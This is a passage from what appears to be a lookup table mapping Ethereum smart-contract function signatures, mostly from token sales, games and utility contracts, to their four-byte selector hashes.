"isPublicSaleNoBonus()": "0x40ce5062", "isPublicSaleWithBonus()": "0x1222e789", "AggiungiNegoziante(address,bool)": "0xe1f6452e", "PaoTestToken()": "0x723fdfe5", "renounceOwnership(bool)": "0x7e926b4b", "transferFundWallet(address)": "0x3b540814", "setJPYC(address)": "0xd577d785", "getJYPCBonus(uint256)": "0x332129a7", "TokenEther()": "0xba3eb50f", "HashTestCoin()": "0x4eb1e71c", "use_bounty_token(address,uint256)": "0xd49758d6", "_zthToken(address)": "0x70107c43", "resumeGame()": "0x3cc4c6ce", "retrieveHouseTake()": "0xf41f4b10", "removeTokenTime(uint256)": "0xf79d6687", "addTokenTime(uint256,uint256)": "0xd6ccf7a7", "showTokensStaked()": "0x4c8316a6", "showGameEnd()": "0x157f5610", "showCurrentWinner()": "0xd46dd5bb", "_settleAndRestart()": "0x4f6d9e16", "StreamityEscrow()": "0x20e62bbc", "EtherNeo()": "0xdcec7204", "setShortDescription(string)": "0x9a459f75", "setBaseCurrency(address)": "0xb478f416", "approveansCall(address,uint256,bytes)": "0x1797552b", "MFTcreator()": "0xeadcbf39", "balanceof(address)": "0x3d64125b", "totalsupply()": "0x72dd529b", "importPresaleBalances(address[],uint256[],address)": "0xee8f997b", "createCloneToken(uint256,string,string)": "0x9ed74a23", "enableMasterTransfers(bool)": "0xaec318f1", "YUN(uint256,string,uint8,string)": "0xed621f0f", "lockPresaleBalances()": "0x5d0a7628", "importPresaleBalances(address[],uint256[])": "0x128f04e7", "ProofToken(address,address,uint256,string,string)": "0x7a50aeb5", "createCloneToken(address,uint256,string,string)": "0x59b58dba", "RecordableRefundableCrowdsale(uint256)": "0x1555fe7e", "RecordingRefundVault(address)": "0x2cc6d768", "getDepositedValue(address)": "0x5f4b2873", "updateDeposit(address,uint256,uint256)": "0x6172c0df", "newDeposit(address,uint256,uint256)": "0x45751137", "getDepositedCount()": "0xf409ab66", "isDeposited(address)": "0x73732024", "TripleT()": "0xd1bd56c1", "killWithBenefits()": "0x535d4156", "MediaBroadcast()": "0x8a8b4d61", "TTTToken()": "0x7effb427", "addCode(string,string)": "0x2029e599", "XCoin(uint256,string,string)": "0x3fddd97d", "YYYToken()": "0x34dc864c", "zasxzasxqaqq()": "0x12555df2", "issueDevsTokens()": "0x71e07813", "refundTokensSale(address[])": "0x9ba896cc", "refundTokensPresale(address[])": "0x338bfcd6", "issueTokensSale(address[])": "0x417297a0", "issueTokensPresale(address[])": "0xa82fc94f", "issueTokensSale(address,uint256)": "0x3c4f3c12", "issueTokensPresale(address,uint256)": "0x7ab38e88", "deliver(address,uint256,uint256)": "0xe0fce922", "reserveFunds()": "0x72a9e232", "TBL4TokenSale()": "0x556e2eb9", "TBL4Token()": "0x9c269c34", "WatahaToken()": "0x8b133c56", "RecoveryKeccak256(address,uint256,address,uint256,uint256,uint256,uint8,bytes32,bytes32)": "0x83636209", "checkHash1(address,uint256,address,uint256,uint256,uint256)": "0xfdce8e02", "salesAgent()": "0x0dfa71ae", "INITIAL_TAP()": "0x9054bbb6", "isEthPayable()": "0x1b3e8cda", "clearRAMAll()": "0xbd68817f", "totalLBSold_GENERAL_3()": "0x2b7dd488", "masterCopyCountdown()": "0x0e7c0f80", "rewardDistributionEnd()": "0x9fa80c6e", "privateSaleEtherRaised()": "0x8e8556b4", "maxEther()": "0x0902b25d", "transferlocked()": "0xd7816f45", "PRCT100_R2()": "0x8eaf1dab", "myEther()": "0x836dea0b", "totalTokensForSaleDuringPreICO()": "0xc02aaea1", "lastInvestorsProfitSum()": "0xa4425c55", "collectedETH()": "0xdfccdef5", "richest()": "0x02e26c38", "allShares()": "0x441b09d9", "phase4Duration()": "0xfc65169a", "clonedFrom()": "0xd179eb71", "unrespondedCnt()": "0x908f68ee", "FACTOR_11()": "0x0b1b92dd", "_batch3_icosaleStartTimestamp()": "0xe7530cfc", "test_withdraw()": "0x5d42513b", "killToken()": "0x2bd7cd17", "TIMETHRESHOLD()": "0x234e5f16", "burnAllowed()": "0x634c688a", "totalDividendPayOuts()": "0x3d28e2ac", "rateOfZLT()": "0x0e870871", "importer()": "0x62932301", "QNTUsdRate()": "0xd1ea8b89", "publicMin()": "0x4ec70fde", "uncleRate()": "0x1bc41284", "isMaxSupplyLocked()": "0xb8ffc962", "UCCOIN_PER_ETHER()": "0xa9bb3274", "retraitStandard_1()": "0x6e6a42ec", "turnId()": "0xe055bba4", "plutocrat()": "0xa3c9df3f", "weiAmountShare()": "0xf396cd66", "assignedAmountToMarketExpand()": "0x930622ed", "smsCertifier()": "0x30a55316", "canReceiveMintWhiteList()": "0x1f7af1df", "mintingPaused()": "0xe1a283d6", "SixPlayerRoulette()": "0x81c64ea2", "tokensToCompany()": "0xa29337bd", "ForSale()": "0x2701d40f", "moneyTotal()": "0x663083f6", "lastBlock_f16()": "0xa547adce", "employeeAddress()": "0x26c5c154", "PHASE2_SUPPLY()": "0x95c43d84", "bssTotalSuply()": "0x443afe2b", "population()": "0x78880f4a", "withinRefundPeriod()": "0x7f070a9b", "m_nonEtherController()": "0xf4fb7d4e", "preSaleOpen()": "0xba11ecde", "allKeys()": "0xcb965ae9", "regulationsFulfilled()": "0x1d289e57", "AgriChainData()": "0xcde4018e", "icoTokenExchangeRate()": "0x06df6cf0", "eventDate()": "0x4bfbe5df", "setTokenDistribution()": "0x96406391", "nextFieldIndex()": "0x6e17e7c2", "isPurchasingPaused()": "0xcc15bee7", "saleState()": "0x603f4d52", "pool_name()": "0x2d59680d", "minimumNumberOfTokens()": "0xb3f841ba", "migrationCounter()": "0x8b800e6f", "valInt()": "0xf793fb64", "wlStartBlock()": "0x04e262b8", "evalTransitionState()": "0x498022ea", "total_bet_purchased()": "0x3bb81b60", "deregistrationDate()": "0x25b75b7b", "bonusThresholdWei()": "0xbaf652fe", "EGGS_TO_HATCH_1TURTLE()": "0x8d5dee05", "minNac()": "0xaa931697", "goalSale()": "0x1e191c0f", "CHINESE_EXCHANGE_3()": "0x2f53cc96", "buyTokensWithGuarantee()": "0x85b9f607", "mainSale_EndDate()": "0x8a0904da", "FOUNDERS_TOKENS_LOCK_PERIOD()": "0x9127bc2a", "addressFundDigitalMarket()": "0xb3a1ca52", "MorzeF()": "0x7596732f", "poolBLock()": "0x2aac6911", "sumICO1()": "0x87b0d60c", "eth2erc20()": "0xa7384c1e", "afterForkRescueContractBalance()": "0xd6fe3d6d", "maxTokensToMint()": "0xf669052a", "OWNER_ADDR()": "0x632e1dfe", "min_buy_block()": "0x62568d83", "rewardScarcityFactor()": "0x512267b0", "isKYCRequiredToSendTokens()": "0x72a7ff87", "EthPerToken()": "0xff184b5d", "exchangeIEO()": "0xdcea80a5", "user_contract()": "0xd3749a15", "intial_supply()": "0x7169dd5d", "initialTiers()": "0x1e28f29b", "maxPerTeam()": "0x90393fc8", "reservationFund()": "0xb78c1517", "tokenFacebook()": "0x32c0f801", "bountyTokenFund()": "0x3406956a", "lost()": "0x3b3493d3", "APaymentToken(uint256)": "0x673fa8c9", "Distributor(address,address)": "0x0028b91f", "execute(uint256,address[],uint256[],uint8[],bytes32[],bytes32[])": "0xc11bf4e3", "kill(uint256,address[],uint256[],uint8[],bytes32[],bytes32[])": "0xa17ecf9e", "multisigwallet(address[],uint256)": "0x40c92ae6", "ownerIndexBit(address)": "0x16270f7d", "confirmTransaction()": "0xc7a6c454", "ContributionWallet(address,uint256,address)": "0x12495a5d", "distributeFoundersRewards(address[],uint256[],uint256[])": "0xb0ebefbc", "Sale(address,address,uint256,string,uint8,string,uint256,uint256,uint256)": "0xaf6b08a1", "createEvent(uint256)": "0x977d996d", "loop(uint256)": "0x0b7d796e", "ret()": "0x1b08d96f", "existIdAtCurrentVersion(bytes32)": "0xd5b01c99", "setDefault(bytes32)": "0xa983dcc0", "shouldReturnDefault(bytes32)": "0xce3ccfd0", "prepare(bytes32)": "0xd941c4ad", "existIdBeforeVersion(bytes32)": "0x9b0facaa", "existIdAfterVersion(bytes32)": "0x42636c09", "exist(bytes32)": "0x73e8b3d4", "setArbitratorI(address)": "0x5b4c6994", "createEscrowByBuyer(address,uint256)": "0xe462c888", "createEscrowBySeller(address,uint256)": "0xdf444df1", "complete()": "0x522e1177", "getSeller()": "0xdbd0e1b6", "getBuyer()": "0x603daf9a", "setSeller(uint256)": "0xc3b4db25", "setBuyer(uint256)": "0xaa454e9c", "getSum()": "0x569c5f6d", "fillArray()": "0xf460473e", "getMyAddress()": "0x9a166299", "addLog(string,string)": "0xa273079a", "getCreateFeeTokenFeeWindowValue()": "0x4cf00716", "getCreateFeeToken()": "0x4e194cc0", "fun(uint256)": "0x7a9839c2", "GSSingle(uint256)": "0xd305577e", "getInitialReportStakeSize()": "0xaf6b3615", "getOrCacheMarketCreationCost()": "0xec86fdbd", "getOrCacheTargetReporterGasCosts()": "0x39d26051", "getOrCacheReportingFeeDivisor()": "0x8f93bffe", "calculateFloatingValue(uint256,uint256,uint256,uint256,uint256,uint256)": "0x5bafecf5", "getOrCacheDesignatedReportNoShowBond()": "0xfd1e5e7a", "getOrCacheDesignatedReportStake()": "0xe79609e2", "getOrCacheValidityBond()": "0xaf4cd457", "getTargetRepMarketCapInAttoeth()": "0x4a719a27", "getRepMarketCapInAttoeth()": "0x13ad9ce1", "getOpenInterestInAttoEth()": "0x6a9d7629", "incrementOpenInterest(uint256)": "0xce483e88", "decrementOpenInterest(uint256)": "0xb62418a1", "getFeeWindowForForkEndTime()": "0x92cb9030", "getOrCreateFeeWindowForForkEndTime()": "0x74d6aa1f", "removeMarketFrom()": "0x77a3a0a2", "addMarketTo()": "0xfeeda367", "getWinningChildUniverse()": "0x6f70b9cb", "updateTentativeWinningChildUniverse(bytes32)": "0xf7095d9d", "createChildUniverse(uint256[],bool)": "0xdf428e3b", "getNextFeeWindow()": "0xedd1d02e", "getOrCreateNextFeeWindow()": "0x0cc8c9af", "getCurrentFeeWindow()": "0x79f96600", "getOrCreateCurrentFeeWindow()": "0x68a7effc", "getPreviousFeeWindow()": "0x6def1efc", "getOrCreatePreviousFeeWindow()": "0x225640ab", "getFeeWindowByTimestamp(uint256)": "0xaa2bebb7", "getOrCreateFeeWindowByTimestamp(uint256)": "0xb66afea3", "getDisputeRoundDurationInSeconds()": "0x331172f3", "getFeeWindowId(uint256)": "0xdae8af77", "getChildUniverse(bytes32)": "0xeceba876", "isForking()": "0xbecb1f35", "getFeeWindow(uint256)": "0x40b73897", "getInitialReportMinValue()": "0x5f723b50", "getDisputeThresholdForFork()": "0xfb03eaea", "getForkReputationGoal()": "0x7c377d74", "getForkEndTime()": "0x77e71ee5", "getForkingMarket()": "0xcb1d8418", "getReputationToken()": "0xb80907f2", "getParentPayoutDistributionHash()": "0xc38c0fa7", "getParentUniverse()": "0xa63f1350", "getTypeName()": "0xdb0a087c", "updateForkValues()": "0x9ab448d9", "fork()": "0x4591c060", "recordResult(address,address,address)": "0xd1ddb24e", "EloTest()": "0xb6096ce9", "subtract(uint256,uint256)": "0x3ef5e445", "multiply(uint256,uint256)": "0x165c4a16", "ENS(address)": "0x19a17468", "insertNodeBatch(bytes32,bytes32[2][5])": "0x41562e69", "insertNode(bytes32,bytes32,bytes32)": "0xf4b97c4c", "insertSection(bytes32)": "0xbfec8b01", "newIndex(bytes32)": "0xe3a37ea2", "generateSection()": "0xddaaff27", "removeNode(bytes32,bytes32)": "0xbc2eb3f8", "removeSection(bytes32,bytes32)": "0x8f9e1409", "getNodesBatch(bytes32,bytes32)": "0x9fc18031", "getNode(bytes32)": "0x50c946fe", "getIndex(bytes32)": "0x8527831b", "getSection(bytes32)": "0xa1b35c79", "nextSection(bytes32)": "0x34d40382", "getHeirachy(bytes32)": "0xad2e1d49", "nodeExists(bytes32,bytes32)": "0x66db11e7", "childExists(bytes32)": "0x08b370cf", "sendPreSaleBonus(address,address)": "0xd0b753f3", "sendPreSaleBonusMany(address[])": "0xd49982cc", "drainAUC(uint256)": "0xf25dafd1", "setAuthorization(address,address,bool)": "0x81dca05c", "AuctusBonusDistribution()": "0x56d89b1f", "getTokenAmount(address)": "0xe6ae1a97", "Smrtoken()": "0x0da04fa6", "setTokenData(uint256,bytes32[])": "0x59118221", "isAuthorizedAddress(address)": "0x4a85280e", "setAuthorizedAddress(address,bool)": "0x1351cf51", "tokenExpirationTime(uint256)": "0xbde86dd1", "tokenDataValue(uint256,uint256)": "0xacec460f", "tokenProof(uint256)": "0x7c8ff8ac", "conventionId()": "0x5f54fa98", "mint(address,uint256,string,string,bytes32[],bytes32[])": "0x00ea81c0", "_setTokenUri(uint256,string)": "0x3086719a", "addNFToken(address,uint256)": "0x9c01e1f5", "removeNFToken(address,uint256)": "0x8f847076", "IM()": "0x1d898f52", "OmixToken(uint256)": "0xd7655b98", "Greenbit()": "0x4b272c4a", "ENDOairdrop()": "0xd0c412ec", "claimBounty()": "0xee4be288", "grantBounty(address,uint256)": "0xab6b7e22", "reward(address,address)": "0x4d5b0081", "Startable()": "0xb5531651", "PauseInfrastructure(bool)": "0xa5acc46e", "DTCC()": "0xcd0f5abd", "mintForFund(address)": "0xc3ba7574", "GNCCrowdsale(address,address,address)": "0x949ba7c3", "removePermission(uint8)": "0xf1807e35", "getApprove(uint8)": "0x59939e21", "setApproveOwner(uint8,bool)": "0x79f7e600", "TrioPeriodicTransfer(address)": "0x6ff10dd7", "totalTransfersInSchedule()": "0x335b496e", "autoTransfer()": "0x0d342cab", "TPTTransfer()": "0x215bad32", "schedule(uint256,uint256)": "0x1d9b1d6f", "schedules(uint256)": "0xbdc6d9ab", "removeSchedules(uint256,uint256[])": "0x3d532bde", "insertSchedules(uint256,uint32[],uint256[])": "0xaf01866d", "TPTSchedules()": "0x68fbd0a8", "contributor(uint256)": "0x65158b3b", "contributors()": "0x6e7e3b2b", "removeContributors(uint256[])": "0xbeda86b9", "addContributors(address[],bytes32[])": "0xcd9b2f05", "_removeContributor(uint256)": "0xb8d87069", "_pushContributor(address,bytes32)": "0x8ea55bd7", "TPTContributors()": "0xdb15520d", "prod(address,bytes32,uint128)": "0x552ac31e", "poke(address,bytes32)": "0xad8ae3ae", "prod(bytes32,uint128)": "0x7ed040f2", "PresalePool(address,uint256,uint256)": "0xc1127f90", "setBurnerOwner(address,address)": "0x5ddd8248", "setIcoOwner(address,address)": "0x89d410e9", "StepCoin()": "0xa26b2d76", "HumanBlockToken()": "0xc62dee76", "disableVoting()": "0x04cd1819", "enableVoting()": "0xeb4439fb", "AMLOveCoinVoting(address)": "0x458e18d7", "MOVIECREDITS()": "0xd3b6fbc2", "Paymec()": "0xcc3c59cc", "MapleCoin()": "0xf07b9f20", "STASHToken()": "0xd5778efa", "Jancok()": "0x61a2493a", "decreaseApprovalByLegacy(address,address,uint256)": "0x6001279f", "increaseApprovalByLegacy(address,address,uint256)": "0xa9538157", "MANHATTANPROXYYORKAVE()": "0x6f1e6419", "createFirstCommonsForum()": "0xcfdd7e8a", "_removeLastOwnerHoldingsFromToken(address,uint256,uint256)": "0x49fd5791", "_removeShareFromLastOwner(address,uint256,uint256)": "0xd3707129", "_addNewOwnerHoldingsToToken(address,uint256,uint256)": "0x054909aa", "_addShareToNewOwner(address,uint256,uint256)": "0x61f2c8b0", "getFirstCommonsForum()": "0xee7e508a", "assignSharedOwnership(address,uint256)": "0x25e3d7b4", "DivisibleFirstCommonsForumToken()": "0x40c44c5b", "sendGift(address)": "0xde2e6136", "changeFriend(address,address)": "0x1d3e2d1b", "changeGift(uint256)": "0x697b139e", "isMigrationFinished()": "0x21d3d2ee", "migrateMileageLeader(uint8,address,uint256)": "0x01c7cb58", "migratePriceLeader(uint8,address,uint256)": "0xa692d5ae", "CCH_LLV_FIFA_1()": "0x857d39d7", "Tanaka()": "0x9128bbc6", "Joe223()": "0x4df93196", "Hodl()": "0x2ec6ea30", "withdrawPurchasedTokens()": "0xbecd7027", "StarbaseCrowdsale(address)": "0xde96e823", "withdrawEtherHomeLocal(address)": "0x16f36d74", "withdrawEtherHomeExternal()": "0xfc77060d", "sendSurplusTokens()": "0xd4d37883", "bonusCalculate(uint256)": "0xd2cad6da", "TokenICOGAT()": "0xdd1bb6f5", "Primal()": "0x008a706b", "zeroFeesTransfer(address,address,uint256)": "0xbba9a9f6", "transferCoins(address,uint256)": "0x2dba5cfa", "CarbonTOKEN()": "0x3570f217", "HumanStandardToken123(uint256,string,uint8,string)": "0xdfe1304c", "Simpletoken()": "0xcbccf9d6", "_sendToken(address,address,uint256)": "0x750cc645", "TokenERC20(address,uint256,address)": "0xbcdda53f", "SpankICO()": "0x60874b27", "Spank(string,string,uint8,uint256,uint256)": "0xa719804d", "BitcoinLiza()": "0x65c0eecf", "OTA()": "0x880e73a3", "ElearningCoin(uint256,string,uint8,string)": "0x5760168b", "BDAYSALE()": "0x9fa9440c", "CCHToken(uint256,string,string)": "0x3a9143e6", "Aequitas()": "0xd70dbf7d", "updateAccount()": "0x69995128", "CapitalMiningToken(string,uint8,string,string,uint256,uint256,uint256,uint256,uint256,uint256)": "0xd5551518", "Bounty0xEscrow()": "0xf00c67fc", "setStopDefrost()": "0x79ae1c36", "getAddressAndBalance(address)": "0xe7990596", "getAddressBalance(address)": "0x35046722", "getStartIcoTimestamp()": "0x782b2340", "defrostTokens(uint256,uint256)": "0x37253e35", "canDefrost()": "0x63b3c007", "lagDefrost()": "0x8a56d115", "getDefrostFactor()": "0xc85bc22d", "getAssignedSupply()": "0x4ff92d6f", "batchAssignTokens(address[],uint256[],uint256[])": "0x7fc90a5c", "setDefroster(address)": "0x5808ee15", "OZTToken()": "0x645f754a", "minimum(uint256,uint256)": "0xdd2d2a12", "HKIN(uint256,string,string)": "0xa974e21f", "TheSchmeckle()": "0x5af9f9d5", "RocketFuelToken()": "0xc5a8d421", "MicroBTC()": "0xc7e92738", "min_balance_for_bonus()": "0xb525ab8d", "available_without_bonus()": "0x667336d8", "available_with_bonus()": "0x9f7904af", "my_token_balance()": "0x2798d1b2", "allForPopulate(uint256)": "0x676b064e", "itemsByName(string)": "0xe9f12ed3", "getNames()": "0xcd838f0f", "calculateFirstCut(uint256)": "0x027a7ccc", "setUrl(uint256,string)": "0xaef95098", "composite(uint256,uint256,uint8)": "0xd0f96983", "_mint(uint256,address,string,string)": "0x7fbc0c48", "listItem(uint256,address,string)": "0x45e4fd6e", "disableERC721()": "0x162bb373", "CryptoMyWord()": "0xd48b7a9d", "zrcoin(uint256,string,uint8,string)": "0x7c0c19b3", "ClearCoin()": "0x4b200fac", "removeDelegate(address)": "0x67e7646f", "addDelegate(address)": "0xe71bdf41", "getCertifier(address)": "0x1d706777", "startNewStakingInterval(uint256,uint256)": "0xa7ae9756", "redeemLevAndFee(address)": "0x3c1d28a3", "redeemLevAndFeeToStakers(address[])": "0x545842ff", "redeemLevAndFeeByStaker()": "0xdaa147f3", "updateFeeForCurrentStakingInterval()": "0x32191017", "revertFeeCalculatedFlag(bool)": "0xc761a2f5", "setFeeToken(address)": "0x15cce224", "setLevToken(address)": "0x133323c8", "Stake(address[],address,address,uint256,address)": "0x7ff91228", "mintTokens(address)": "0xbcfaa79d", "withdrawMintTokens(address,uint256)": "0xb5bb5ee4", "approveMintTokens(address,uint256)": "0x269f4663", "getLockTokens(address)": "0x9b98a94b", "setDurationOfLock(uint256)": "0x027ec848", "setmessiCommunityAddress(address)": "0xa5a8c53d", "setmessiDevAddress(address)": "0x5765cc2a", "disableSetTransferable()": "0x12dc34a0", "YouTube()": "0xe1fcb86d", "TraceChain()": "0xf346fd74", "fetchFunds()": "0x68447a55", "setMainSaleDates(uint256,uint256)": "0x4aac75a7", "finaliseCrowdsale()": "0x2bdfbd39", "UAPCrowdsale(uint256,uint256,uint256,address,address)": "0x6ecbb556", "UAPToken(address)": "0x9cf78527", "setMinimalTokens(uint256)": "0x8b72ddf7", "setCalculatorAddress(address)": "0x5507a82e", "setTokenSeller(address)": "0x7a22393b", "Sale(address,address)": "0x4a5ecc66", "Rafatar()": "0xef02ce46", "GreenXToken()": "0xf130da53", "rejectContribution(address)": "0x50240158", "acceptContribution(address)": "0x9aa3a443", "resetKYC(address)": "0xd19370bb", "getPotentialAmount(address)": "0x57850fc7", "getAmountAttempted(address)": "0xf232a84d", "getAddressTwo(address)": "0xe664e1e0", "getAddressOne(address)": "0x3e82eca7", "getOccupation(address)": "0x9d41a9af", "getPhone(address)": "0x62714a14", "verifyKYC(bytes32,bytes32,bytes32,bytes32,bytes32)": "0xde38a5f4", "changeLimits(uint256)": "0x3f2e917c", "CampaignContract()": "0x85443a2b", "CHCTokenERC20()": "0x8b6f8646", "changeRefundToken()": "0x7e1cae40", "rewarding(address)": "0xda13610c", "dappsBonusCalc(address,uint256)": "0x0f3f53c1", "TripCash()": "0x70a951ce", "updataLockPercent()": "0x51b0b931", "XYCCTEST()": "0xb3521607", "EximchainToken()": "0x86c2b53d", "addFee(address,uint256)": "0x7718238f", "getMyFee(address)": "0x78e88c3c", "EtherGit(address)": "0x6008fb07", "makeTrans(address,uint256)": "0x10c9ab39", "sendP(address,uint256)": "0x23141fd0", "Test1()": "0xb15addec", "TokenContract(uint256)": "0x9411c88b", "OwnedHelper()": "0x4103c4c4", "wasEmergencyCancelled()": "0x6741629c", "isSenderEmergencyMultisig()": "0x29ae4c70", "isSenderOriginalOwner()": "0x63862fd5", "isNodeTLDOfRegistrar()": "0xd1dbcd70", "isContractNodeOwner()": "0x4419cd81", "fireOnChanged(bytes32)": "0x5badf100", "fireOnChanged(bytes32,uint256[])": "0x4dd4547d", "doSetSettings(uint256)": "0x5f19c7b2", "doTransferOwnership(address)": "0x12bff72f", "construct(bytes32,string,bytes32,address,uint128,uint256)": "0xa1e4f73d", "add(string,int256)": "0x0d1ee029", "addDollarAmount(address,int160)": "0x2198e780", "addCoinAmount(address,uint32)": "0x665f09fa", "setCoinBalance(address,uint32)": "0x82ee27cc", "setDollarBalance(address,int160)": "0x59dc6d5c", "GxTradersProxy(address)": "0x0f5f0151", "transferAmount(address,uint256)": "0xd7081e03", "smartWallet()": "0xf4f96d29", "claimBonus()": "0x50635394", "getMemberBonus(address)": "0xf9b8d639", "Bonus(uint256,uint256)": "0x4fed9a60", "registerVehicle(string,string,uint8,address)": "0x4859f430", "getOwnerVehicleDetails(address)": "0x182e9a1e", "VehicleRTO(address)": "0x90cd5860", "logging()": "0xee7e94f3", "Arthimetic()": "0xb5d8514b", "DMToken()": "0xaaeea585", "donate(address)": "0x00362a95", "charityClaim()": "0xa42f126c", "fallback(uint256)": "0x329b59d1", "fallbackProposal(address)": "0x9789103f", "refundSplitMembers()": "0xe2786d65", "Suspended()": "0x7951357e", "Rejected()": "0xefde6dcf", "Accepted()": "0x33cf58f9", "Applied()": "0x8f34296b", "createController(address)": "0x13cc22ea", "createProxy()": "0x684649a6", "appendKeyValue(string,address)": "0xd880610c", "appendKeyValue(string,int256)": "0x1d04c92b", "appendKeyValue(string,uint256)": "0x38597911", "appendKeyValue(string,string)": "0xb18e4f5f", "append(string)": "0x86cdbae9", "push(string)": "0x4f3d057a", "getClaimsIdByType(uint256)": "0x6fa28249", "getClaim(bytes32)": "0xc9100bcb", "getKeysByType(uint256)": "0x41cbfc7b", "getKeyType(address)": "0x4b24fd0d", "_removeKey(address)": "0x2be10384", "_addKey(address,uint256)": "0xf44dc562", "removeClaim(bytes32)": "0x4eee424a", "addClaim(uint256,address,uint256,bytes32,bytes32,string)": "0x95b1e4f2", "approve(bytes32,bool)": "0x4ec79937", "removeKey(address)": "0x69e78499", "replaceKey(address,address)": "0xb53ea1b6", "addKey(address,uint256)": "0xa2d39bdb", "PersonaIdentity()": "0x45874c93", "returnFixed()": "0x2a649d6a", "returnDynamic()": "0xede3d9d5", "manyInputsNoReturn(uint256,uint256,uint256,uint256)": "0x8d6e56e1", "noInputReturn()": "0xf99514e2", "getOtherMapValue(uint256)": "0xa0305398", "addToOtherMap(uint256,uint256)": "0xe1c6b14b", "getOtherName()": "0xc4a0dada", "getArraySize()": "0x3b1cbad8", "getArrayValue(uint256)": "0x5d1bd962", "getMapValue(uint256)": "0x7973830a", "getConstantName()": "0x23b1ed54", "getPrivateName()": "0x28db5470", "getIntValue()": "0x828909bd", "getStringConstant()": "0xc48513a4", "getStringMember()": "0xd8ca713a", "addToMap(uint256,uint256)": "0x5aa4c8a9", "pushArrayValue(uint256)": "0x5ffb1578", "setPrivateName(bytes32)": "0xe89a49e2", "setIntValue(int256)": "0xf1dffed7", "populateStringMember()": "0x1cc6ea05", "setStringMember(string)": "0x317053f8", "negotiate(uint32)": "0xf6b94cb4", "Property(string,string)": "0x6f977413", "_updateBurnRate()": "0xd9c7ddfa", "_updateClaims(string,string,string)": "0xa594a236", "_presentValue(uint256)": "0xf5653a79", "getSeatMessage(uint256)": "0xfbb8932a", "getSeatMessageUrl(uint256)": "0xf14ff5cf", "getSeatAvatarUrl(uint256)": "0xe537a195", "getSeatAddress(uint256)": "0xfb386216", "getSeatClaim(uint256)": "0x1598b2e0", "buySeat(string,string,string)": "0x61b9c9f4", "setMockedTime(uint256)": "0xab8be231", "REALPlaceHolderMock(address,address,address)": "0xe13fe91c", "_forwardFunds()": "0xb3413d9f", "proveOwnership(bytes,int256)": "0x4d6f58d5", "proveBuy(bytes,int256)": "0x9418d25a", "totalNacInPool()": "0x0d441f8c", "best_gamer()": "0x28919b47", "fundToken()": "0x50adcdb7", "TOTAL_SUPPLY_BOTTOM_BOUND()": "0x9b21929a", "Outcome()": "0xa9814d14", "approveModeratorship()": "0xafb47bb3", "buyRate()": "0xfc37987b", "GetBal()": "0xbf8869b5", "bearToken()": "0xa67a6eab", "lrcTokenAddress()": "0x4c0a6532", "fundingEndTime()": "0x74eedd46", "investorAddress()": "0x12e228fd", "isWithdrawEnabled()": "0x880dc4e6", "distributedBountyTotal()": "0x1ba7013b", "badgeTotalSupply()": "0xfc24e589", "Amount_of_Chi_for_One_ETH()": "0x3de7dfb1", "team2Token()": "0xdabbd670", "_frozeAmount()": "0x83ae62c4", "SaleActive()": "0xf1d2165f", "STORES_TO_UPGRADE_1CENTER()": "0x4b6a9f1d", "request_until()": "0x432f3c22", "blockBeforeChange()": "0xfca062d3", "CLOUDForGas()": "0xbceaf1fd", "BOUNTY_SUPPLY()": "0x5d771933", "totalCalls()": "0x3af3f24f", "getWeiToUsdExchangeRate()": "0x8cfa8eea", "reserves()": "0x75172a8b", "GetMinimumBet_Ether()": "0x454dd6d2", "unlocksCount()": "0xe0715a86", "TEAM_SUPPLY()": "0xb9c3a818", "periods()": "0xa4caeb42", "emergencyAddr()": "0x7106312c", "approveSetTokenControlInfo()": "0xc31c5221", "buy100()": "0xce89b5de", "mintedWallets()": "0x3cfaa9ed", "saleDistributorAddress()": "0x8b077355", "jackpotHit()": "0x80d1bd47", "allocateServusTokens()": "0x2d226a10", "ebyteBalance()": "0x169742f6", "roundTwoBlock()": "0xd25a13b4", "oraclizeGasLimit()": "0x50b9c428", "EMISSION_FOR_SALESTAGE5()": "0xc1ee22dd", "get_funds_left_for_reinvestment()": "0x4e4d3e56", "globalOrderSerial()": "0x118e1f2e", "tokenReserve()": "0xcbcb3171", "tradeActive()": "0x5882128d", "contractFee()": "0xd41977cd", "winningNumbers()": "0x21e0f228", "icoPhase()": "0x68955fb1", "tokensDistributedPresale()": "0xed17dab7", "tokenBuyerWallet()": "0x3e7e70a4", "Totalbalance()": "0xfd0998de", "lastTokenCreated()": "0xe40819af", "END_PREICO_TIMESTAMP()": "0x76eb5ce0", "extra_bonus_amount()": "0x14e3fad3", "VULCAN_PROMETHEUS_MAX_CARGO()": "0xf2325244", "votingEndsInHHMM()": "0xc2a15e7e", "fundFoundation()": "0x13bd9e3c", "winnerPoolTotal()": "0x29114d65", "investorWhiteList()": "0xe342c2e6", "crowdsaleEndDate()": "0x192f1076", "_startTime()": "0xfa1acb5c", "periodICOStage7()": "0x13d5469d", "numPurchasers()": "0x4ce6962c", "frozenDaysForPreICO()": "0x53c37276", "CryptoKitties()": "0x2d5cb5d5", "advancedTokensPerEth()": "0xd7989a93", "feeLottery()": "0x5387a233", "currNumOfBattleCards()": "0xf34e4c60", "commissionAddress()": "0x931742d3", "foundationMultisig()": "0x1ba91c20", "minimumIcoRate()": "0x51003cab", "crowdsaleMintingCap()": "0xb65dc843", "smallestUnit()": "0x7c858e02", "ADVISOR_STAKE_THREE()": "0x9afa3dc7", "INITIAL_BONUSLIST_TOKENS()": "0xa6b05af6", "EGGS_TO_HATCH_1LOBSTER()": "0x49a51839", "finalizePartnerSale()": "0xaf99a327", "freezeMintUntil()": "0xdda6020b", "isShutdown()": "0xbf86d690", "communityusersCap()": "0xd74543f0", "startRoundSeed()": "0x8c91daac", "rewardPoolWallet()": "0x71ea980c", "tokensFor1EthP2()": "0x2c270c7e", "tokenSaleUpperLimit()": "0x0ddeeb4f", "virtualReserveBalance()": "0x8e068b11", "deployBlockNumber()": "0x206288d3", "sumHardCapPublicSale()": "0x8e6b551c", "teamReserveTokensDistributed()": "0xf454c32c", "phase_2_rate()": "0xa5290f74", "teamTokensCap()": "0x69e795be", "dateDefrost()": "0x74f059ad", "amountForRefundIfSoftCapNotReached()": "0x013953a6", "MIN_ICO_SLOGN_COLLECTED()": "0xb60cc68b", "earlySuccessTimestamp()": "0x93608dfb", "bountyManagerDistributionContract()": "0xd4a226c3", "devTeamBalance()": "0x14fddb71", "GolemSupply()": "0x5d585176", "gasForCLI()": "0x96da2848", "bullsmasterReq()": "0xc28a9157", "disableDonationContract()": "0xd390e819", "forceVoidExternal()": "0x4564ea36", "PublicSold()": "0x1d62c5bf", "citiesSold()": "0xda74c5a1", "Leg()": "0xc3b24be0", "centsPerEther()": "0x04520116", "minimumPriceCount()": "0xe3c73d32", "_deadline()": "0x1b8db774", 